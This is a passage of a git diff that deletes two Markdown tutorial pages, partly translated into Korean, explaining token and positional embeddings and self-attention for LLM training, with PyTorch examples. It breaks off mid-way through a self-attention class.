๋ถ„ํ•ดํ•ฉ๋‹ˆ๋‹ค. - -> [!TIP] -> ์ด ์„ธ ๋ฒˆ์งธ ๋‹จ๊ณ„์˜ ๋ชฉํ‘œ๋Š” ๋งค์šฐ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค: **์–ดํœ˜์˜ ์ด์ „ ๊ฐ ํ† ํฐ์— ์›ํ•˜๋Š” ์ฐจ์›์˜ ๋ฒกํ„ฐ๋ฅผ ํ• ๋‹นํ•˜์—ฌ ๋ชจ๋ธ์„ ํ›ˆ๋ จ์‹œํ‚ค๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.** ์–ดํœ˜์˜ ๊ฐ ๋‹จ์–ด๋Š” X ์ฐจ์›์˜ ๊ณต๊ฐ„์—์„œ ํ•œ ์ ์ด ๋ฉ๋‹ˆ๋‹ค.\ -> ๊ฐ ๋‹จ์–ด์˜ ์ดˆ๊ธฐ ์œ„์น˜๋Š” "๋ฌด์ž‘์œ„๋กœ" ์ดˆ๊ธฐํ™”๋˜๋ฉฐ, ์ด๋Ÿฌํ•œ ์œ„์น˜๋Š” ํ›ˆ๋ จ ๊ฐ€๋Šฅํ•œ ๋งค๊ฐœ๋ณ€์ˆ˜์ž…๋‹ˆ๋‹ค(ํ›ˆ๋ จ ์ค‘์— ๊ฐœ์„ ๋ฉ๋‹ˆ๋‹ค). -> -> ๊ฒŒ๋‹ค๊ฐ€, ํ† ํฐ ์ž„๋ฒ ๋”ฉ ๋™์•ˆ **๋˜ ๋‹ค๋ฅธ ์ž„๋ฒ ๋”ฉ ๋ ˆ์ด์–ด๊ฐ€ ์ƒ์„ฑ๋ฉ๋‹ˆ๋‹ค**. ์ด๋Š” (์ด ๊ฒฝ์šฐ) **ํ›ˆ๋ จ ๋ฌธ์žฅ์—์„œ ๋‹จ์–ด์˜ ์ ˆ๋Œ€ ์œ„์น˜๋ฅผ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค**. ์ด๋ ‡๊ฒŒ ํ•˜๋ฉด ๋ฌธ์žฅ์—์„œ ์„œ๋กœ ๋‹ค๋ฅธ ์œ„์น˜์— ์žˆ๋Š” ๋‹จ์–ด๋Š” ์„œ๋กœ ๋‹ค๋ฅธ ํ‘œํ˜„(์˜๋ฏธ)์„ ๊ฐ–๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. - -### **ํ† ํฐ ์ž„๋ฒ ๋”ฉ์ด๋ž€ ๋ฌด์—‡์ธ๊ฐ€?** - -**ํ† ํฐ ์ž„๋ฒ ๋”ฉ**์€ ์—ฐ์† ๋ฒกํ„ฐ ๊ณต๊ฐ„์—์„œ ํ† ํฐ์˜ ์ˆ˜์น˜์  ํ‘œํ˜„์ž…๋‹ˆ๋‹ค. ์–ดํœ˜์˜ ๊ฐ ํ† ํฐ์€ ๊ณ ์ •๋œ ์ฐจ์›์˜ ๊ณ ์œ ํ•œ ๋ฒกํ„ฐ์™€ ์—ฐ๊ฒฐ๋ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๋ฒกํ„ฐ๋Š” ํ† ํฐ์— ๋Œ€ํ•œ ์˜๋ฏธ์  ๋ฐ ๊ตฌ๋ฌธ์  ์ •๋ณด๋ฅผ ์บก์ฒ˜ํ•˜์—ฌ ๋ชจ๋ธ์ด ๋ฐ์ดํ„ฐ์˜ ๊ด€๊ณ„์™€ ํŒจํ„ด์„ ์ดํ•ดํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. - -- **์–ดํœ˜ ํฌ๊ธฐ:** ๋ชจ๋ธ์˜ ์–ดํœ˜์— ์žˆ๋Š” ๊ณ ์œ ํ•œ ํ† ํฐ(์˜ˆ: ๋‹จ์–ด, ํ•˜์œ„ ๋‹จ์–ด)์˜ ์ด ์ˆ˜. -- **์ž„๋ฒ ๋”ฉ ์ฐจ์›:** ๊ฐ ํ† ํฐ์˜ ๋ฒกํ„ฐ์— ์žˆ๋Š” ์ˆ˜์น˜ ๊ฐ’(์ฐจ์›)์˜ ์ˆ˜. ๋” ๋†’์€ ์ฐจ์›์€ ๋” ๋ฏธ์„ธํ•œ ์ •๋ณด๋ฅผ ์บก์ฒ˜ํ•  ์ˆ˜ ์žˆ์ง€๋งŒ ๋” ๋งŽ์€ ๊ณ„์‚ฐ ์ž์›์„ ์š”๊ตฌํ•ฉ๋‹ˆ๋‹ค. - -**์˜ˆ์‹œ:** - -- **์–ดํœ˜ ํฌ๊ธฐ:** 6 ํ† ํฐ \[1, 2, 3, 4, 5, 6] -- **์ž„๋ฒ ๋”ฉ ์ฐจ์›:** 3 (x, y, z) - -### **ํ† ํฐ ์ž„๋ฒ ๋”ฉ ์ดˆ๊ธฐํ™”** - -ํ›ˆ๋ จ ์‹œ์ž‘ ์‹œ, ํ† ํฐ ์ž„๋ฒ ๋”ฉ์€ ์ผ๋ฐ˜์ ์œผ๋กœ ์ž‘์€ ๋ฌด์ž‘์œ„ ๊ฐ’์œผ๋กœ ์ดˆ๊ธฐํ™”๋ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์ดˆ๊ธฐ ๊ฐ’์€ ํ›ˆ๋ จ ๋ฐ์ดํ„ฐ๋ฅผ ๊ธฐ๋ฐ˜์œผ๋กœ ํ† ํฐ์˜ ์˜๋ฏธ๋ฅผ ๋” ์ž˜ ๋‚˜ํƒ€๋‚ด๊ธฐ ์œ„ํ•ด ํ›ˆ๋ จ ์ค‘์— ์กฐ์ •(๋ฏธ์„ธ ์กฐ์ •)๋ฉ๋‹ˆ๋‹ค. - -**PyTorch ์˜ˆ์‹œ:** -```python -import torch - -# Set a random seed for reproducibility -torch.manual_seed(123) - -# Create an embedding layer with 6 tokens and 3 dimensions -embedding_layer = torch.nn.Embedding(6, 3) - -# Display the initial weights (embeddings) -print(embedding_layer.weight) -``` -**์ถœ๋ ฅ:** -```lua -luaCopy codeParameter containing: -tensor([[ 0.3374, -0.1778, -0.1690], -[ 0.9178, 1.5810, 1.3010], -[ 1.2753, -0.2010, -0.1606], -[-0.4015, 0.9666, -1.1481], -[-1.1589, 0.3255, -0.6315], -[-2.8400, -0.7849, -1.4096]], requires_grad=True) -``` -**์„ค๋ช…:** - -- ๊ฐ ํ–‰์€ ์–ดํœ˜์˜ ํ† ํฐ์— ํ•ด๋‹นํ•ฉ๋‹ˆ๋‹ค. -- ๊ฐ ์—ด์€ ์ž„๋ฒ ๋”ฉ ๋ฒกํ„ฐ์˜ ์ฐจ์›์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. -- ์˜ˆ๋ฅผ ๋“ค์–ด, ์ธ๋ฑ์Šค `3`์— ์žˆ๋Š” ํ† ํฐ์€ ์ž„๋ฒ ๋”ฉ ๋ฒกํ„ฐ `[-0.4015, 0.9666, -1.1481]`๋ฅผ ๊ฐ€์ง‘๋‹ˆ๋‹ค. - -**ํ† ํฐ์˜ ์ž„๋ฒ ๋”ฉ ์ ‘๊ทผํ•˜๊ธฐ:** -```python -# Retrieve the embedding for the token at index 3 -token_index = torch.tensor([3]) -print(embedding_layer(token_index)) -``` -**์ถœ๋ ฅ:** -```lua -tensor([[-0.4015, 0.9666, -1.1481]], grad_fn=) -``` -**ํ•ด์„:** - -- ์ธ๋ฑ์Šค `3`์˜ ํ† ํฐ์€ ๋ฒกํ„ฐ `[-0.4015, 0.9666, -1.1481]`๋กœ ํ‘œํ˜„๋ฉ๋‹ˆ๋‹ค. -- ์ด๋Ÿฌํ•œ ๊ฐ’๋“ค์€ ๋ชจ๋ธ์ด ํ›ˆ๋ จ ์ค‘์— ์กฐ์ •ํ•˜์—ฌ ํ† ํฐ์˜ ๋งฅ๋ฝ๊ณผ ์˜๋ฏธ๋ฅผ ๋” ์ž˜ ํ‘œํ˜„ํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•˜๋Š” ํ•™์Šต ๊ฐ€๋Šฅํ•œ ๋งค๊ฐœ๋ณ€์ˆ˜์ž…๋‹ˆ๋‹ค. - -### **ํ›ˆ๋ จ ์ค‘ ํ† ํฐ ์ž„๋ฒ ๋”ฉ ์ž‘๋™ ๋ฐฉ์‹** - -ํ›ˆ๋ จ ์ค‘์— ์ž…๋ ฅ ๋ฐ์ดํ„ฐ์˜ ๊ฐ ํ† ํฐ์€ ํ•ด๋‹น ์ž„๋ฒ ๋”ฉ ๋ฒกํ„ฐ๋กœ ๋ณ€ํ™˜๋ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ๋ฒกํ„ฐ๋Š” ์ฃผ์˜ ๋ฉ”์ปค๋‹ˆ์ฆ˜ ๋ฐ ์‹ ๊ฒฝ๋ง ๋ ˆ์ด์–ด์™€ ๊ฐ™์€ ๋ชจ๋ธ ๋‚ด์˜ ๋‹ค์–‘ํ•œ ๊ณ„์‚ฐ์— ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. - -**์˜ˆ์‹œ ์‹œ๋‚˜๋ฆฌ์˜ค:** - -- **๋ฐฐ์น˜ ํฌ๊ธฐ:** 8 (๋™์‹œ์— ์ฒ˜๋ฆฌ๋˜๋Š” ์ƒ˜ํ”Œ ์ˆ˜) -- **์ตœ๋Œ€ ์‹œํ€€์Šค ๊ธธ์ด:** 4 (์ƒ˜ํ”Œ๋‹น ํ† ํฐ ์ˆ˜) -- **์ž„๋ฒ ๋”ฉ ์ฐจ์›:** 256 - -**๋ฐ์ดํ„ฐ ๊ตฌ์กฐ:** - -- ๊ฐ ๋ฐฐ์น˜๋Š” `(batch_size, max_length, embedding_dim)` ํ˜•ํƒœ์˜ 3D ํ…์„œ๋กœ ํ‘œํ˜„๋ฉ๋‹ˆ๋‹ค. -- ์šฐ๋ฆฌ์˜ ์˜ˆ์‹œ์—์„œ๋Š” ํ˜•ํƒœ๊ฐ€ `(8, 4, 256)`์ด ๋ฉ๋‹ˆ๋‹ค. - -**์‹œ๊ฐํ™”:** -```css -cssCopy codeBatch -โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” -โ”‚ Sample 1 โ”‚ -โ”‚ โ”Œโ”€โ”€โ”€โ”€โ”€โ” โ”‚ -โ”‚ โ”‚Tokenโ”‚ โ†’ [xโ‚โ‚, xโ‚โ‚‚, ..., xโ‚โ‚‚โ‚…โ‚†] -โ”‚ โ”‚ 1 โ”‚ โ”‚ -โ”‚ โ”‚... โ”‚ โ”‚ -โ”‚ โ”‚Tokenโ”‚ โ”‚ -โ”‚ โ”‚ 4 โ”‚ โ”‚ -โ”‚ โ””โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚ -โ”‚ Sample 2 โ”‚ -โ”‚ โ”Œโ”€โ”€โ”€โ”€โ”€โ” โ”‚ -โ”‚ โ”‚Tokenโ”‚ โ†’ [xโ‚‚โ‚, xโ‚‚โ‚‚, ..., xโ‚‚โ‚‚โ‚…โ‚†] -โ”‚ โ”‚ 1 โ”‚ โ”‚ -โ”‚ โ”‚... โ”‚ โ”‚ -โ”‚ โ”‚Tokenโ”‚ โ”‚ -โ”‚ โ”‚ 4 โ”‚ โ”‚ -โ”‚ โ””โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚ -โ”‚ ... โ”‚ -โ”‚ Sample 8 โ”‚ -โ”‚ โ”Œโ”€โ”€โ”€โ”€โ”€โ” โ”‚ -โ”‚ โ”‚Tokenโ”‚ โ†’ [xโ‚ˆโ‚, xโ‚ˆโ‚‚, ..., xโ‚ˆโ‚‚โ‚…โ‚†] -โ”‚ โ”‚ 1 โ”‚ โ”‚ -โ”‚ โ”‚... โ”‚ โ”‚ -โ”‚ โ”‚Tokenโ”‚ โ”‚ -โ”‚ โ”‚ 4 โ”‚ โ”‚ -โ”‚ โ””โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚ -โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ -``` -**์„ค๋ช…:** - -- ์‹œํ€€์Šค์˜ ๊ฐ ํ† ํฐ์€ 256์ฐจ์› ๋ฒกํ„ฐ๋กœ ํ‘œํ˜„๋ฉ๋‹ˆ๋‹ค. -- ๋ชจ๋ธ์€ ์ด๋Ÿฌํ•œ ์ž„๋ฒ ๋”ฉ์„ ์ฒ˜๋ฆฌํ•˜์—ฌ ์–ธ์–ด ํŒจํ„ด์„ ํ•™์Šตํ•˜๊ณ  ์˜ˆ์ธก์„ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. - -## **์œ„์น˜ ์ž„๋ฒ ๋”ฉ: ํ† ํฐ ์ž„๋ฒ ๋”ฉ์— ๋งฅ๋ฝ ์ถ”๊ฐ€ํ•˜๊ธฐ** - -ํ† ํฐ ์ž„๋ฒ ๋”ฉ์ด ๊ฐœ๋ณ„ ํ† ํฐ์˜ ์˜๋ฏธ๋ฅผ ํฌ์ฐฉํ•˜๋Š” ๋ฐ˜๋ฉด, ์‹œํ€€์Šค ๋‚ด์—์„œ ํ† ํฐ์˜ ์œ„์น˜๋ฅผ ๋ณธ์งˆ์ ์œผ๋กœ ์ธ์ฝ”๋”ฉํ•˜์ง€๋Š” ์•Š์Šต๋‹ˆ๋‹ค. ํ† ํฐ์˜ ์ˆœ์„œ๋ฅผ ์ดํ•ดํ•˜๋Š” ๊ฒƒ์€ ์–ธ์–ด ์ดํ•ด์— ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์„œ **์œ„์น˜ ์ž„๋ฒ ๋”ฉ**์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. - -### **์œ„์น˜ ์ž„๋ฒ ๋”ฉ์ด ํ•„์š”ํ•œ ์ด์œ :** - -- **ํ† ํฐ ์ˆœ์„œ์˜ ์ค‘์š”์„ฑ:** ๋ฌธ์žฅ์—์„œ ์˜๋ฏธ๋Š” ์ข…์ข… ๋‹จ์–ด์˜ ์ˆœ์„œ์— ๋”ฐ๋ผ ๋‹ฌ๋ผ์ง‘๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, "๊ณ ์–‘์ด๊ฐ€ ๋งคํŠธ ์œ„์— ์•‰์•˜๋‹ค"์™€ "๋งคํŠธ๊ฐ€ ๊ณ ์–‘์ด ์œ„์— ์•‰์•˜๋‹ค." -- **์ž„๋ฒ ๋”ฉ ํ•œ๊ณ„:** ์œ„์น˜ ์ •๋ณด๊ฐ€ ์—†์œผ๋ฉด ๋ชจ๋ธ์€ ํ† ํฐ์„ "๋‹จ์–ด์˜ ๊ฐ€๋ฐฉ"์œผ๋กœ ์ทจ๊ธ‰ํ•˜์—ฌ ์‹œํ€€์Šค๋ฅผ ๋ฌด์‹œํ•ฉ๋‹ˆ๋‹ค. - -### **์œ„์น˜ ์ž„๋ฒ ๋”ฉ์˜ ์œ ํ˜•:** - -1. **์ ˆ๋Œ€ ์œ„์น˜ ์ž„๋ฒ ๋”ฉ:** -- ์‹œํ€€์Šค์˜ ๊ฐ ์œ„์น˜์— ๊ณ ์œ ํ•œ ์œ„์น˜ ๋ฒกํ„ฐ๋ฅผ ํ• ๋‹นํ•ฉ๋‹ˆ๋‹ค. -- **์˜ˆ์‹œ:** ์–ด๋–ค ์‹œํ€€์Šค์˜ ์ฒซ ๋ฒˆ์งธ ํ† ํฐ์€ ๋™์ผํ•œ ์œ„์น˜ ์ž„๋ฒ ๋”ฉ์„ ๊ฐ€์ง€๋ฉฐ, ๋‘ ๋ฒˆ์งธ ํ† ํฐ์€ ๋‹ค๋ฅธ ์œ„์น˜ ์ž„๋ฒ ๋”ฉ์„ ๊ฐ€์ง‘๋‹ˆ๋‹ค. -- **์‚ฌ์šฉ ์˜ˆ:** OpenAI์˜ GPT ๋ชจ๋ธ. -2. **์ƒ๋Œ€ ์œ„์น˜ ์ž„๋ฒ ๋”ฉ:** -- ํ† ํฐ์˜ ์ ˆ๋Œ€ ์œ„์น˜๊ฐ€ ์•„๋‹Œ ์ƒ๋Œ€์  ๊ฑฐ๋ฆฌ๋ฅผ ์ธ์ฝ”๋”ฉํ•ฉ๋‹ˆ๋‹ค. -- **์˜ˆ์‹œ:** ๋‘ ํ† ํฐ์ด ์–ผ๋งˆ๋‚˜ ๋–จ์–ด์ ธ ์žˆ๋Š”์ง€๋ฅผ ๋‚˜ํƒ€๋‚ด๋ฉฐ, ์‹œํ€€์Šค ๋‚ด์—์„œ์˜ ์ ˆ๋Œ€ ์œ„์น˜์™€๋Š” ๊ด€๊ณ„์—†์ด ํ‘œ์‹œํ•ฉ๋‹ˆ๋‹ค. -- **์‚ฌ์šฉ ์˜ˆ:** Transformer-XL ๋ฐ BERT์˜ ์ผ๋ถ€ ๋ณ€ํ˜• ๋ชจ๋ธ. - -### **์œ„์น˜ ์ž„๋ฒ ๋”ฉ์˜ ํ†ตํ•ฉ ๋ฐฉ๋ฒ•:** - -- **๋™์ผํ•œ ์ฐจ์›:** ์œ„์น˜ ์ž„๋ฒ ๋”ฉ์€ ํ† ํฐ ์ž„๋ฒ ๋”ฉ๊ณผ ๋™์ผํ•œ ์ฐจ์›์„ ๊ฐ€์ง‘๋‹ˆ๋‹ค. -- **๋ง์…ˆ:** ์œ„์น˜ ์ž„๋ฒ ๋”ฉ์€ ํ† ํฐ ์ž„๋ฒ ๋”ฉ์— ์ถ”๊ฐ€๋˜์–ด ํ† ํฐ์˜ ์ •์ฒด์„ฑ๊ณผ ์œ„์น˜ ์ •๋ณด๋ฅผ ๊ฒฐํ•ฉํ•˜์ง€๋งŒ ์ „์ฒด ์ฐจ์›์€ ์ฆ๊ฐ€ํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. - -**์œ„์น˜ ์ž„๋ฒ ๋”ฉ ์ถ”๊ฐ€ ์˜ˆ์‹œ:** - -ํ† ํฐ ์ž„๋ฒ ๋”ฉ ๋ฒกํ„ฐ๊ฐ€ `[0.5, -0.2, 0.1]`์ด๊ณ  ๊ทธ ์œ„์น˜ ์ž„๋ฒ ๋”ฉ ๋ฒกํ„ฐ๊ฐ€ `[0.1, 0.3, -0.1]`๋ผ๊ณ  ๊ฐ€์ •ํ•ฉ์‹œ๋‹ค. ๋ชจ๋ธ์—์„œ ์‚ฌ์šฉ๋˜๋Š” ๊ฒฐํ•ฉ ์ž„๋ฒ ๋”ฉ์€: -```css -Combined Embedding = Token Embedding + Positional Embedding -= [0.5 + 0.1, -0.2 + 0.3, 0.1 + (-0.1)] -= [0.6, 0.1, 0.0] -``` -**์œ„์น˜ ์ž„๋ฒ ๋”ฉ์˜ ์ด์ :** - -- **๋งฅ๋ฝ ์ธ์‹:** ๋ชจ๋ธ์€ ํ† ํฐ์˜ ์œ„์น˜์— ๋”ฐ๋ผ ๊ตฌ๋ถ„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -- **์‹œํ€€์Šค ์ดํ•ด:** ๋ชจ๋ธ์ด ๋ฌธ๋ฒ•, ๊ตฌ๋ฌธ ๋ฐ ๋งฅ๋ฝ ์˜์กด์  ์˜๋ฏธ๋ฅผ ์ดํ•ดํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. - -## ์ฝ”๋“œ ์˜ˆ์ œ - -๋‹ค์Œ์€ [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb)์—์„œ ๊ฐ€์ ธ์˜จ ์ฝ”๋“œ ์˜ˆ์ œ์ž…๋‹ˆ๋‹ค: -```python -# Use previous code... - -# Create dimensional emdeddings -""" -BPE uses a vocabulary of 50257 words -Let's supose we want to use 256 dimensions (instead of the millions used by LLMs) -""" - -vocab_size = 50257 -output_dim = 256 -token_embedding_layer = torch.nn.Embedding(vocab_size, output_dim) - -## Generate the dataloader like before -max_length = 4 -dataloader = create_dataloader_v1( -raw_text, batch_size=8, max_length=max_length, -stride=max_length, shuffle=False -) -data_iter = iter(dataloader) -inputs, targets = next(data_iter) - -# Apply embeddings -token_embeddings = token_embedding_layer(inputs) -print(token_embeddings.shape) -torch.Size([8, 4, 256]) # 8 x 4 x 256 - -# Generate absolute embeddings -context_length = max_length -pos_embedding_layer = torch.nn.Embedding(context_length, output_dim) - -pos_embeddings = pos_embedding_layer(torch.arange(max_length)) - -input_embeddings = token_embeddings + pos_embeddings -print(input_embeddings.shape) # torch.Size([8, 4, 256]) -``` -## References - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) diff --git a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md b/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md deleted file mode 100644 index f73f9f1b3..000000000 --- a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md +++ /dev/null @@ -1,416 +0,0 @@ -# 4. Attention Mechanisms - -## Attention Mechanisms and Self-Attention in Neural Networks - -Attention mechanisms allow neural networks to f**ocus on specific parts of the input when generating each part of the output**. They assign different weights to different inputs, helping the model decide which inputs are most relevant to the task at hand. This is crucial in tasks like machine translation, where understanding the context of the entire sentence is necessary for accurate translation. - -> [!TIP] -> The goal of this fourth phase is very simple: **Apply some attetion mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\ -> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information. - -### Understanding Attention Mechanisms - -In traditional sequence-to-sequence models used for language translation, the model encodes an input sequence into a fixed-size context vector. However, this approach struggles with long sentences because the fixed-size context vector may not capture all necessary information. Attention mechanisms address this limitation by allowing the model to consider all input tokens when generating each output token. - -#### Example: Machine Translation - -Consider translating the German sentence "Kannst du mir helfen diesen Satz zu รผbersetzen" into English. A word-by-word translation would not produce a grammatically correct English sentence due to differences in grammatical structures between languages. An attention mechanism enables the model to focus on relevant parts of the input sentence when generating each word of the output sentence, leading to a more accurate and coherent translation. - -### Introduction to Self-Attention - -Self-attention, or intra-attention, is a mechanism where attention is applied within a single sequence to compute a representation of that sequence. It allows each token in the sequence to attend to all other tokens, helping the model capture dependencies between tokens regardless of their distance in the sequence. - -#### Key Concepts - -- **Tokens**: ์ž…๋ ฅ ์‹œํ€€์Šค์˜ ๊ฐœ๋ณ„ ์š”์†Œ (์˜ˆ: ๋ฌธ์žฅ์˜ ๋‹จ์–ด). -- **Embeddings**: ์˜๋ฏธ ์ •๋ณด๋ฅผ ํฌ์ฐฉํ•˜๋Š” ํ† ํฐ์˜ ๋ฒกํ„ฐ ํ‘œํ˜„. -- **Attention Weights**: ๋‹ค๋ฅธ ํ† ํฐ์— ๋Œ€ํ•œ ๊ฐ ํ† ํฐ์˜ ์ค‘์š”์„ฑ์„ ๊ฒฐ์ •ํ•˜๋Š” ๊ฐ’. - -### Calculating Attention Weights: A Step-by-Step Example - -Let's consider the sentence **"Hello shiny sun!"** and represent each word with a 3-dimensional embedding: - -- **Hello**: `[0.34, 0.22, 0.54]` -- **shiny**: `[0.53, 0.34, 0.98]` -- **sun**: `[0.29, 0.54, 0.93]` - -Our goal is to compute the **context vector** for the word **"shiny"** using self-attention. - -#### Step 1: Compute Attention Scores - -> [!TIP] -> Just multiply each dimension value of the query with the relevant one of each token and add the results. You get 1 value per pair of tokens. - -For each word in the sentence, compute the **attention score** with respect to "shiny" by calculating the dot product of their embeddings. - -**Attention Score between "Hello" and "shiny"** - -
- -**Attention Score between "shiny" and "shiny"** - -
- -**Attention Score between "sun" and "shiny"** - -
- -#### Step 2: Normalize Attention Scores to Obtain Attention Weights - -> [!TIP] -> Don't get lost in the mathematical terms, the goal of this function is simple, normalize all the weights so **they sum 1 in total**. -> -> Moreover, **softmax** function is used because it accentuates differences due to the exponential part, making easier to detect useful values. - -Apply the **softmax function** to the attention scores to convert them into attention weights that sum to 1. - -
- -Calculating the exponentials: - -
- -Calculating the sum: - -
- -Calculating attention weights: - -
- -#### Step 3: Compute the Context Vector - -> [!TIP] -> Just get each attention weight and multiply it to the related token dimensions and then sum all the dimensions to get just 1 vector (the context vector) - -The **context vector** is computed as the weighted sum of the embeddings of all words, using the attention weights. - -
- -Calculating each component: - -- **Weighted Embedding of "Hello"**: - -
- -- **Weighted Embedding of "shiny"**: - -
- -- **Weighted Embedding of "sun"**: - -
- -Summing the weighted embeddings: - -`context vector=[0.0779+0.2156+0.1057, 0.0504+0.1382+0.1972, 0.1237+0.3983+0.3390]=[0.3992,0.3858,0.8610]` - -**This context vector represents the enriched embedding for the word "shiny," incorporating information from all words in the sentence.** - -### Summary of the Process - -1. **Compute Attention Scores**: Use the dot product between the embedding of the target word and the embeddings of all words in the sequence. -2. **Normalize Scores to Get Attention Weights**: Apply the softmax function to the attention scores to obtain weights that sum to 1. -3. **Compute Context Vector**: Multiply each word's embedding by its attention weight and sum the results. - -## Self-Attention with Trainable Weights - -In practice, self-attention mechanisms use **trainable weights** to learn the best representations for queries, keys, and values. This involves introducing three weight matrices: - -
- -The query is the data to use like before, while the keys and values matrices are just random-trainable matrices. - -#### Step 1: Compute Queries, Keys, and Values - -Each token will have its own query, key and value matrix by multiplying its dimension values by the defined matrices: - -
- -These matrices transform the original embeddings into a new space suitable for computing attention. - -**Example** - -Assuming: - -- Input dimension `din=3` (embedding size) -- Output dimension `dout=2` (desired dimension for queries, keys, and values) - -Initialize the weight matrices: -```python -import torch.nn as nn - -d_in = 3 -d_out = 2 - -W_query = nn.Parameter(torch.rand(d_in, d_out)) -W_key = nn.Parameter(torch.rand(d_in, d_out)) -W_value = nn.Parameter(torch.rand(d_in, d_out)) -``` -์ฟผ๋ฆฌ, ํ‚ค, ๊ฐ’ ๊ณ„์‚ฐ: -```python -queries = torch.matmul(inputs, W_query) -keys = torch.matmul(inputs, W_key) -values = torch.matmul(inputs, W_value) -``` -#### Step 2: Compute Scaled Dot-Product Attention - -**Compute Attention Scores** - -์ด์ „ ์˜ˆ์ œ์™€ ์œ ์‚ฌํ•˜์ง€๋งŒ, ์ด๋ฒˆ์—๋Š” ํ† ํฐ์˜ ์ฐจ์› ๊ฐ’์„ ์‚ฌ์šฉํ•˜๋Š” ๋Œ€์‹ , ์ด๋ฏธ ์ฐจ์›์„ ์‚ฌ์šฉํ•˜์—ฌ ๊ณ„์‚ฐ๋œ ํ† ํฐ์˜ ํ‚ค ํ–‰๋ ฌ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ๊ฐ ์ฟผ๋ฆฌ `qi`โ€‹์™€ ํ‚ค `kjโ€‹`์— ๋Œ€ํ•ด: - -
- -**Scale the Scores** - -๋‚ด์ ์ด ๋„ˆ๋ฌด ์ปค์ง€๋Š” ๊ฒƒ์„ ๋ฐฉ์ง€ํ•˜๊ธฐ ์œ„ํ•ด, ํ‚ค ์ฐจ์› `dk`โ€‹์˜ ์ œ๊ณฑ๊ทผ์œผ๋กœ ์ ์ˆ˜๋ฅผ ์Šค์ผ€์ผํ•ฉ๋‹ˆ๋‹ค: - -
- -> [!TIP] -> ์ ์ˆ˜๋Š” ์ฐจ์›์˜ ์ œ๊ณฑ๊ทผ์œผ๋กœ ๋‚˜๋ˆ„์–ด์ง€๋Š”๋ฐ, ์ด๋Š” ๋‚ด์ ์ด ๋งค์šฐ ์ปค์งˆ ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ์ด๋ฅผ ์กฐ์ ˆํ•˜๋Š” ๋ฐ ๋„์›€์ด ๋ฉ๋‹ˆ๋‹ค. - -**Apply Softmax to Obtain Attention Weights:** ์ดˆ๊ธฐ ์˜ˆ์ œ์™€ ๊ฐ™์ด, ๋ชจ๋“  ๊ฐ’์„ ์ •๊ทœํ™”ํ•˜์—ฌ ํ•ฉ์ด 1์ด ๋˜๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. - -
- -#### Step 3: Compute Context Vectors - -์ดˆ๊ธฐ ์˜ˆ์ œ์™€ ๊ฐ™์ด, ๊ฐ ๊ฐ’์„ ํ•ด๋‹น ์ฃผ์˜ ๊ฐ€์ค‘์น˜๋กœ ๊ณฑํ•˜์—ฌ ๋ชจ๋“  ๊ฐ’ ํ–‰๋ ฌ์„ ํ•ฉ์‚ฐํ•ฉ๋‹ˆ๋‹ค: - -
- -### Code Example - -[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb)์—์„œ ์˜ˆ์ œ๋ฅผ ๊ฐ€์ ธ์™€์„œ ์šฐ๋ฆฌ๊ฐ€ ์ด์•ผ๊ธฐํ•œ ์ž๊ธฐ ์ฃผ์˜ ๊ธฐ๋Šฅ์„ ๊ตฌํ˜„ํ•˜๋Š” ์ด ํด๋ž˜์Šค๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: -```python -import torch - -inputs = torch.tensor( -[[0.43, 0.15, 0.89], # Your (x^1) -[0.55, 0.87, 0.66], # journey (x^2) -[0.57, 0.85, 0.64], # starts (x^3) -[0.22, 0.58, 0.33], # with (x^4) -[0.77, 0.25, 0.10], # one (x^5) -[0.05, 0.80, 0.55]] # step (x^6) -) - -import torch.nn as nn -class SelfAttention_v2(nn.Module): - -def __init__(self, d_in, d_out, qkv_bias=False): -super().__init__() -self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias) - -def forward(self, x): 